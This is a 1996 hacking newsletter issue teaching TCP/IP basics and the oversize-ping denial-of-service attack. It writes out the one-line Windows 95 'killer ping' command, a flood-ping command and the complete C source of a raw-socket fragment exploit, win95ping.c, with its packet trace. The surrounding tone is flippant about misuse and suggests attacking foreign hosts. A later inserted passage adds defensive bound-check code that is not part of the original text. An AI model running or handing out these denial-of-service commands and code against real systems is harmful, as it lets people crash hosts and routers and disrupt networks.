GUIDE TO (mostly) HARMLESS HACKING
Vol. 2 Number 3
Introduction to TCP/IP. That means packets! Datagrams! Ping oversize
packet denial of service exploit explained. But this hack is
a lot less mostly harmless than most. Don't try this at home...
____________________________________________________________
If you have been on the Happy Hacker list for a while, you've
been getting some items forwarded from the Bugtraq list on a
new ping packet exploit.
Now if this has been sounding like gibberish to you, relax.
It is really very simple. In fact, it is so simple that if you
use Windows 95, by the time you finish this article you
will know a simple, one-line command that you could use to crash
many Internet hosts and routers.
*************************************************
YOU CAN GO TO JAIL WARNING: This time I'm not going to implore
the wannabe evil genius types on this list to be virtuous and
resist the temptation to misuse the information I'm about to
give them. See if I care! If one of those guys gets caught crashing
thousands of Internet hosts and routers, not only will they go
to jail and get a big fine, we'll all think he or she is a dork.
This exploit is a no-brainer, one-line command from Windows 95.
Yeah, the operating system that is designed for clueless morons.
So there is nothing elite about this hack. What is elite is being
able to thwart this attack.
**************************************************
**************************************************
NEWBIE NOTE: If packets, datagrams, and TCP/IP aren't exactly
your bosom buddies yet, believe me, you need to really get in
bed with them in order to call yourself a hacker. So hang in
here for some technical stuff. When we are done, you'll have
the satisfaction of knowing you could wreak havoc on the Internet,
but are too elite to do so.
A packet is a way to send information electronically that
keeps out errors. The idea is that no transmission technology
is perfect. Have you ever played the game "telephone"?
You get a dozen or so people in a circle and the first person
whispers a message to the second. Something like "The bun
is the lowest form of wheat." The second person whispers
to the third, "A bum is the lowest form of cheating."
The third whispers, "Rum is the lowest form of drinking."
And so on. It's really fun to find out how far the message can
mutate as it goes around the circle.
But when, for example, you get email, you would prefer that
it isn't messed up. So the computer that sends the email breaks
it up into little pieces called datagrams. Then it wraps things
around each datagram that tell what computer it needs to go to,
where it came from, and that check whether the datagram might
have been garbled. These wrapped up datagram packages are called
"packets."
(Note: this explanation of datagrams and packets has sent the bad attitude
"hacker" community into a tizzy. You probably can still
find flames about this at Brian Martin's Attrition.org web site. The reason Martin and Michael
Schiffmann think the "payload" of a packet can't be
called a datagram is that Martin and his buddies are deficient
in their education. To be blunt, they learned about computers
in the back alleys of the Internet instead of by studying computer
science.)
Now if the computer sending email to you were to package a
really long message into just one packet, chances are pretty
high that it will get messed up while on its way to the other
computer. Bit burps. So when the receiving computer checks the
packet and finds that it got messed up, it will throw it away
and tell the other computer to send it again. It could take a
long time until this giant packet gets through intact.
But if the message is broken into a lot of little pieces and
wrapped up into bunches of packets, most of them will be good
and the receiving computer will keep them. It will then tell
the sending computer to retransmit just the packets that messed
up. Then when all the pieces finally get there, the receiving
computer puts them together in the right order and lo and behold,
there is the complete, error-free email.
TCP/IP stands for Transmission Control Protocol/Internet Protocol.
It tells computers that are hooked up to the Internet how to
package up messages into packets and how to read these packets
when they arrive from other computers. Ping uses TCP/IP to make its packets.
**********************************************
"Ping" is a command that sends a feeler out from
your computer to another computer to see if it is turned on and
hooked to the same network you are on. On the Internet there
are some ten million computers that you can ping.
Ping is a command you can give, for example, from the Unix,
Windows 95 and Windows NT operating systems. It is part of the
Internet Control Message Protocol (ICMP), which is used to troubleshoot
TCP/IP networks. What it does is tell a remote computer to echo
back a ping. So if you get your ping
back, you know that computer is alive. Furthermore, some forms
of the ping command will also tell you how long it takes for
a message to go out to that computer and come back again.
But how does your computer know that the ping it just sent
out actually echoed back from the targeted computer? The datagram
is the answer. The ping sent out a datagram. If the returning
ping holds this same datagram, you know it was your ping that
just echoed back.
The basic format of this command is simply:
ping hostname
where "hostname" is the Internet address of the
computer you want to check out.
When I give this command from Sun Release 4.1 Unix, I get
the answer "hostname is alive."
**************************************
TECHNICAL TIP: Because of the destructive powers of ping, many
Internet Service Providers hide the ping program in their shell
accounts where clueless newbies can't get their hands on it.
If your shell account says "command not found" when
you enter the ping command, try:
/usr/etc/ping hostname
If this doesn't work, either try the command "whereis ping"
or complain to your ISP's tech support. They may have
disabled ping for ordinary users, but if you convince tech support
you are a good Internet citizen they may let you use it.
***************************************
****************************************
NEWBIE NOTE: You say you can't find a way to ping from your on-line
service? That may be because you don't have a shell account.
But there is one thing you really need in order to hack: A SHELL
ACCOUNT!!!!
The reason hackers make fun of people with America Online
accounts is because that ISP doesn't give out shell accounts.
This is because America Online wants you to be good boys and
girls and not hack!
A "shell account" is an Internet account in which
your computer becomes a terminal of one of your ISP's host
computers. Once you are in the "shell" you can give
commands to the operating system (which is usually Unix) just
like you were sitting there at the console of one of your ISP's
hosts.
You may already have a shell account but just not know how
to log on to it. Call your ISP's tech support to find
out whether you have one, and how to get on it.
***************************************
There are all sorts of fancy variations on the ping command.
And, guess what, whenever there is a command you give over the
Internet that has lots of variations, you can just about count
on there being something hackable in there. Muhahaha!
The flood ping is a simple example. If your operating system
will let you get away with giving the command:
-> ping -f hostname
it sends out a veritable flood of pings, as fast as your ISP's
host machine can make them. This keeps the host you've targeted
so busy echoing back your pings that it can do little else. It
also puts a heavy load on the network.
Hackers with primitive skill levels will sometimes get together
and use several of their computers at once to simultaneously
ping some victim's Internet host computer. This will generally
keep the victim's computer too
busy to do anything else. It may even crash. However, the down
side (from the attackers' viewpoint) is that it keeps the attackers'
computers tied up, too.
**************************************
NETIQUETTE NOTE: Flood pinging a computer is extremely rude.
Get caught doing this and you will be lucky if the worst that
happens is your on-line service provider closes your account.
Do this to a serious hacker and you may need an identity transplant.
If you should start a flood ping kind of by accident, you
can shut it off by holding down the control key and pressing
"c" (control-c).
**************************************
*************************************
EVIL GENIUS TIP: Ping yourself! If you are using some sort of
Unix, your operating system will let you use your computer to
do just about anything to itself that it can do to other computers.
The network address that takes you
back to your own host computer is localhost (or 127.0.0.1). Here's
an example of how I use localhost:
<slug> [65] ->telnet localhost
Trying 127.0.0.1 ...
Connected to localhost.
Escape character is '^]'.
SunOS UNIX (slug)
login:
See, I'm back to the login sequence for the computer named
"slug" all over again.
Now I ping myself:
<llama> [68] ->/usr/etc/ping localhost
localhost is alive
This gives the same result as if I were to command:
<llama> [69] ->/usr/etc/ping llama
llama.swcp.com is alive
****************************************
*****************************************
MUHAHAHA TIP: Want to yank someone's chain? Tell him to ftp to
127.0.0.1 and log in using his or her own user name and password
for kewl warez! My ex-husband Keith Henson did that to the Church
of Scientology. The COGs ftp-ed to 127.0.0.1 and discovered all
their copyrighted scriptures. They assumed this was on Keith's
computer, not theirs. They were *so* sure he had their scriptures
that they took him to court. The judge, when he realized they
were simply looping back to their own computer, literally laughed
them out of court.
For a hilarious transcript or audio tape of this infamous
court session, email hkhenson@cup.portal.com. That's Keith's
email address. My hat is off to a superb hacker!
*******************************************
However, the oversize ping packet exploit you are about to
learn will do even more damage to some hosts than a gang of flood
ping conspirators. And it will do it without tying up the attackers'
computer for any longer than the split second it takes to send
out just one ping.
(Note: This won't work on Windows 98, and won't work across the Internet. You have
to be on a local area network to use "killer ping.")
The easiest way to do this hack is to run Windows 95. Don't
have it? You can generally find an El Cheapo store that will sell
it to you for $99.
To do this, first set up your Windows 95 system so that you
can make a PPP or SLIP connection with the Internet using the
Dialup Networking program under the My Computer icon. You may
need some help from your ISP tech support in setting this up.
You must do it this way or this hack won't work. Your America
Online dialer *definitely* will not work.
************************************
NEWBIE NOTE: If your Internet connection allows you to run a
Web browser that shows pictures, you can use that dialup number
with your Windows 95 Dialup Networking program to get either
a PPP or SLIP connection.
************************************
Next, get your computer connected to the Internet. But don't
run a browser or anything. Instead, once your Dialup Networking
program tells you that you have a connection, click on the "Start"
button and go to the listing "MS-DOS." Open this DOS
window. You'll get a prompt:
C:\windows\>
Now let's first do this the good citizen way. At this prompt
you can type in a plain ordinary "ping" command:
C:\windows\ping hostname
where "hostname" is the address of some Internet
computer. For example, you could ping thales.nmia.com, which
is one of my favorite computers, named after an obscure Greek
philosopher.
Now if you happened to know the address of one of Saddam Hussein's
computers, however, you might want to give the command:
c:\windows\ping -l 65510 saddam_hussein's.computer.mil
Now don't really do this to a real computer! Some, but not
all, computers will crash and either remain hung or reboot when
they get this ping. Others will continue working cheerily along,
and then suddenly go under hours later.
Why? That extra added -l 65510 creates a giant datagram for
the ping packet: 65510 bytes of data plus the 8-byte ICMP header
and the 20-byte IP header comes to 65538 bytes, more than the
65535 bytes an IP datagram is allowed to hold, so the packet goes
out as a string of fragments that add up to an impossible size.
Some computers, when asked to put those fragments back together
and send back an identical datagram, get really messed up.
If you want all the gory details on this ping exploit, including
how to protect your computers from it, check out
http://www.sophist.demon.co.uk/ping.
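The defense is a bound check during reassembly, and the arithmetic is worth seeing as code. The following is an added example, not from the Guide or from Fenner's program: `frag_overflows` is the check a receiving IP stack needs, `parse_frag` reads fragment lines in the tcpdump "(frag ID:LEN@OFF+)" notation used in the trace quoted later on this page, and `reassembled_size` runs the check over a datagram's fragments; the function names, the 20-byte header assumption and the sample lines are constructed for this illustration.

```c
/* Added example (not the Guide's or Fenner's code): the reassembly
 * bound check that protects a receiving IP stack from the oversize
 * ping.  An IP datagram is at most 65535 bytes including its header,
 * so a fragment whose byte offset plus payload length exceeds
 * 65535 - hlen cannot belong to a valid datagram and must be dropped
 * rather than copied into the reassembly buffer.  The sample lines use
 * the tcpdump "(frag ID:LEN@OFF+)" notation from the trace on this
 * page; OFF is in bytes there (the IP header field counts 8-byte units). */
#include <stdio.h>
#include <string.h>

#define IP_MAXPACKET 65535u
#define IP_HDRLEN    20u   /* assumed header length for the samples */

/* 1 if a fragment of `len` payload bytes at byte offset `off` would
 * push the reassembled datagram past the 16-bit total-length limit. */
int frag_overflows(unsigned off, unsigned len, unsigned hlen)
{
    return off + len > IP_MAXPACKET - hlen;
}

/* Parse one trace line such as "... (frag 6144:398@65120)" into its
 * payload length and byte offset.  Returns 1 on success, else 0. */
int parse_frag(const char *line, unsigned *len, unsigned *off)
{
    const char *p = strstr(line, "(frag ");
    unsigned id;
    if (p == NULL)
        return 0;
    return sscanf(p, "(frag %u:%u@%u", &id, len, off) == 3;
}

/* Walk the fragments of one datagram.  Returns the reassembled size
 * (header + payload), or 0 as soon as one fragment fails the bound. */
unsigned reassembled_size(const char *const *lines, int n)
{
    unsigned end = 0, len, off;
    for (int i = 0; i < n; i++) {
        if (!parse_frag(lines[i], &len, &off))
            continue;                 /* not a fragment line */
        if (frag_overflows(off, len, IP_HDRLEN))
            return 0;                 /* drop: total would exceed 65535 */
        if (off + len > end)
            end = off + len;
    }
    return end + IP_HDRLEN;
}

/* Constructed sample: first, second and last fragments of the
 * "ping -l 65510" datagram as shown in the trace on this page.
 * 65120 + 398 = 65518 bytes of payload, 65538 with the header. */
static const char *const oversize_trace[] = {
    "17:26:11.013622 cslwin95 > arkroyal: icmp: echo request (frag 6144:1480@0+)",
    "17:26:11.015079 cslwin95 > arkroyal: (frag 6144:1480@1480+)",
    "17:26:11.069107 cslwin95 > arkroyal: (frag 6144:398@65120)",
};
/* Constructed sample: the largest legal echo request, ping -l 65507
 * (65507 data + 8 ICMP header bytes = 65515), ends exactly at the limit. */
static const char *const legal_trace[] = {
    "10:00:00.000000 host > peer: icmp: echo request (frag 7:1480@0+)",
    "10:00:00.000001 host > peer: (frag 7:395@65120)",
};
```

A stack that applies `frag_overflows` before touching its reassembly buffer discards the 45th fragment of the oversize ping and never builds the 65538-byte datagram, which is the whole of the fix.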
Now there are other ways to manufacture a giant ping datagram
besides using Windows 95. For example, if you run certain FreeBSD
or Linux versions of Unix on your PC, you can run this program,
which was posted to the Bugtraq list.
From: Bill Fenner <fenner@freefall.freebsd.org>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
Subject: Ping exploit program
Since some people don't necessarily have Windows '95 boxes lying
around, I (Fenner) wrote the following exploit program.
It requires a raw socket layer that doesn't mess with the packet,
so BSD 4.3, SunOS and Solaris are out. It works fine on 4.4BSD systems.
It should work on Linux if you compile with -DREALLY_RAW.
Feel free to do with this what you want. Please use this
tool only to test your own machines, and not to crash others'.
/*
 * win95ping.c
 *
 * Simulate the evil win95 "ping -l 65510 buggyhost".
 * version 1.0 Bill Fenner <fenner@freebsd.org> 22-Oct-1996
 *
 * This requires raw sockets that don't mess with the packet at all (other
 * than adding the checksum). That means that SunOS, Solaris, and
 * BSD4.3-based systems are out. BSD4.4 systems (FreeBSD, NetBSD,
 * OpenBSD, BSDI) will work. Linux might work, I don't have a Linux
 * system to try it on.
 *
 * The attack from the Win95 box looks like:
 * 17:26:11.013622 cslwin95 > arkroyal: icmp: echo request (frag 6144:1480@0+)
 * 17:26:11.015079 cslwin95 > arkroyal: (frag 6144:1480@1480+)
 * 17:26:11.016637 cslwin95 > arkroyal: (frag 6144:1480@2960+)
 * 17:26:11.017577 cslwin95 > arkroyal: (frag 6144:1480@4440+)
 * 17:26:11.018833 cslwin95 > arkroyal: (frag 6144:1480@5920+)
 * 17:26:11.020112 cslwin95 > arkroyal: (frag 6144:1480@7400+)
 * 17:26:11.021346 cslwin95 > arkroyal: (frag 6144:1480@8880+)
 * 17:26:11.022641 cslwin95 > arkroyal: (frag 6144:1480@10360+)
 * 17:26:11.023869 cslwin95 > arkroyal: (frag 6144:1480@11840+)
 * 17:26:11.025140 cslwin95 > arkroyal: (frag 6144:1480@13320+)
 * 17:26:11.026604 cslwin95 > arkroyal: (frag 6144:1480@14800+)
 * 17:26:11.027628 cslwin95 > arkroyal: (frag 6144:1480@16280+)
 * 17:26:11.028871 cslwin95 > arkroyal: (frag 6144:1480@17760+)
 * 17:26:11.030100 cslwin95 > arkroyal: (frag 6144:1480@19240+)
 * 17:26:11.031307 cslwin95 > arkroyal: (frag 6144:1480@20720+)
 * 17:26:11.032542 cslwin95 > arkroyal: (frag 6144:1480@22200+)
 * 17:26:11.033774 cslwin95 > arkroyal: (frag 6144:1480@23680+)
 * 17:26:11.035018 cslwin95 > arkroyal: (frag 6144:1480@25160+)
 * 17:26:11.036576 cslwin95 > arkroyal: (frag 6144:1480@26640+)
 * 17:26:11.037464 cslwin95 > arkroyal: (frag 6144:1480@28120+)
 * 17:26:11.038696 cslwin95 > arkroyal: (frag 6144:1480@29600+)
 * 17:26:11.039966 cslwin95 > arkroyal: (frag 6144:1480@31080+)
 * 17:26:11.041218 cslwin95 > arkroyal: (frag 6144:1480@32560+)
 * 17:26:11.042579 cslwin95 > arkroyal: (frag 6144:1480@34040+)
 * 17:26:11.043807 cslwin95 > arkroyal: (frag 6144:1480@35520+)
 * 17:26:11.046276 cslwin95 > arkroyal: (frag 6144:1480@37000+)
 * 17:26:11.047236 cslwin95 > arkroyal: (frag 6144:1480@38480+)
 * 17:26:11.048478 cslwin95 > arkroyal: (frag 6144:1480@39960+)
 * 17:26:11.049698 cslwin95 > arkroyal: (frag 6144:1480@41440+)
 * 17:26:11.050929 cslwin95 > arkroyal: (frag 6144:1480@42920+)
 * 17:26:11.052164 cslwin95 > arkroyal: (frag 6144:1480@44400+)
 * 17:26:11.053398 cslwin95 > arkroyal: (frag 6144:1480@45880+)
 * 17:26:11.054685 cslwin95 > arkroyal: (frag 6144:1480@47360+)
 * 17:26:11.056347 cslwin95 > arkroyal: (frag 6144:1480@48840+)
 * 17:26:11.057313 cslwin95 > arkroyal: (frag 6144:1480@50320+)
 * 17:26:11.058357 cslwin95 > arkroyal: (frag 6144:1480@51800+)
 * 17:26:11.059588 cslwin95 > arkroyal: (frag 6144:1480@53280+)
 * 17:26:11.060787 cslwin95 > arkroyal: (frag 6144:1480@54760+)
 * 17:26:11.062023 cslwin95 > arkroyal: (frag 6144:1480@56240+)
 * 17:26:11.063247 cslwin95 > arkroyal: (frag 6144:1480@57720+)
 * 17:26:11.064479 cslwin95 > arkroyal: (frag 6144:1480@59200+)
 * 17:26:11.066252 cslwin95 > arkroyal: (frag 6144:1480@60680+)
 * 17:26:11.066957 cslwin95 > arkroyal: (frag 6144:1480@62160+)
 * 17:26:11.068220 cslwin95 > arkroyal: (frag 6144:1480@63640+)
 * 17:26:11.069107 cslwin95 > arkroyal: (frag 6144:398@65120)
 *
 */
#include <stdio.h>
#include <stdlib.h>             /* exit() */
#include <strings.h>            /* bzero(), bcopy() */
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>          /* inet_addr(), inet_ntoa() */

/*
 * If your kernel doesn't muck with raw packets, #define REALLY_RAW.
 * This is probably only Linux.  (4.4BSD raw sockets expect ip_len and
 * ip_off in host byte order; Linux expects network byte order.)
 */
#ifdef REALLY_RAW
#define FIX(x)  htons(x)
#else
#define FIX(x)  (x)
#endif

int
main(int argc, char **argv)
{
    int s;
    char buf[1500];                         /* one fragment: 20-byte IP header + 1480 payload */
    struct ip *ip = (struct ip *)buf;
    struct icmp *icmp = (struct icmp *)(ip + 1);
    struct hostent *hp;
    struct sockaddr_in dst;
    int offset;
    int on = 1;

    bzero(buf, sizeof buf);
    bzero(&dst, sizeof dst);

    /* Raw socket with IP_HDRINCL so we supply our own IP header. */
    if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) < 0) {
        perror("socket");
        exit(1);
    }
    if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
        perror("IP_HDRINCL");
        exit(1);
    }
    if (argc != 2) {
        fprintf(stderr, "usage: %s hostname\n", argv[0]);
        exit(1);
    }
    /* Resolve the name; fall back to dotted-quad notation. */
    if ((hp = gethostbyname(argv[1])) == NULL) {
        if ((ip->ip_dst.s_addr = inet_addr(argv[1])) == INADDR_NONE) {
            fprintf(stderr, "%s: unknown host\n", argv[1]);
            exit(1);
        }
    } else {
        bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
    }
    printf("Sending to %s\n", inet_ntoa(ip->ip_dst));

    /* IP header shared by every fragment; only ip_off/ip_len change. */
    ip->ip_v = 4;
    ip->ip_hl = sizeof *ip >> 2;
    ip->ip_tos = 0;
    ip->ip_len = FIX(sizeof buf);
    ip->ip_id = htons(4321);                /* same ID ties the fragments together */
    ip->ip_off = FIX(0);
    ip->ip_ttl = 255;
    ip->ip_p = 1;                           /* IPPROTO_ICMP */
    ip->ip_sum = 0;                         /* kernel fills in */
    ip->ip_src.s_addr = 0;                  /* kernel fills in */

    dst.sin_addr = ip->ip_dst;
    dst.sin_family = AF_INET;

    /* ICMP echo request header at the start of the first fragment.  The
     * payload is all zeros, so the only nonzero 16-bit word in the whole
     * message is type/code (0x0800); its one's complement is the checksum. */
    icmp->icmp_type = ICMP_ECHO;
    icmp->icmp_code = 0;
    icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));
    /* the checksum of all 0's is easy to compute */

    /* Emit 1480-byte fragments; the fragment offset field is in 8-byte
     * units, and every fragment but the last carries the More Fragments
     * flag.  The last one (at byte 65120) is trimmed to 398 payload
     * bytes so the reassembled datagram totals 65538 bytes, three more
     * than the 65535 an IP total-length field can express. */
    for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) {
        ip->ip_off = FIX(offset >> 3);
        if (offset < 65120)
            ip->ip_off |= FIX(IP_MF);
        else
            ip->ip_len = FIX(418);          /* 20 header + 398 payload: make total 65538 */
        if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
                   sizeof dst) < 0) {
            fprintf(stderr, "offset %d: ", offset);
            perror("sendto");
        }
        /* After the first fragment, clear the ICMP header so the
         * remaining fragments carry plain zero payload. */
        if (offset == 0) {
            icmp->icmp_type = 0;
            icmp->icmp_code = 0;
            icmp->icmp_cksum = 0;
        }
    }
    return 0;
}
(End of Fenner's ping exploit message.)
********************************************
YOU CAN GO TO JAIL NOTE: Not only is this hack not elite, if
you are reading this you don't know enough to keep from getting
busted from doing this ping hack. On the other hand, if you were
to do it to an Internet host in Iraq...
********************************************
Of course there are many other kewl things you can do with
ping. If you have a shell account, you can find out lots of stuph
about ping by giving the command:
man ping
In fact, you can get lots of details on any Unix command with
"man."
Have fun with ping -- and be good! But remember, I'm not begging
the evil genius wannabes to be good. See if I care when you get
busted...
_________________________________________________________
To send me confidential email (please, no discussions of illegal
activities) use . Please direct flames to
dev/null@cmeinel.com. Happy hacking!
© 1996 Carolyn P. Meinel. You may forward the GUIDE TO
(mostly) HARMLESS HACKING as long as you leave this notice at
the end.
________________________________________________________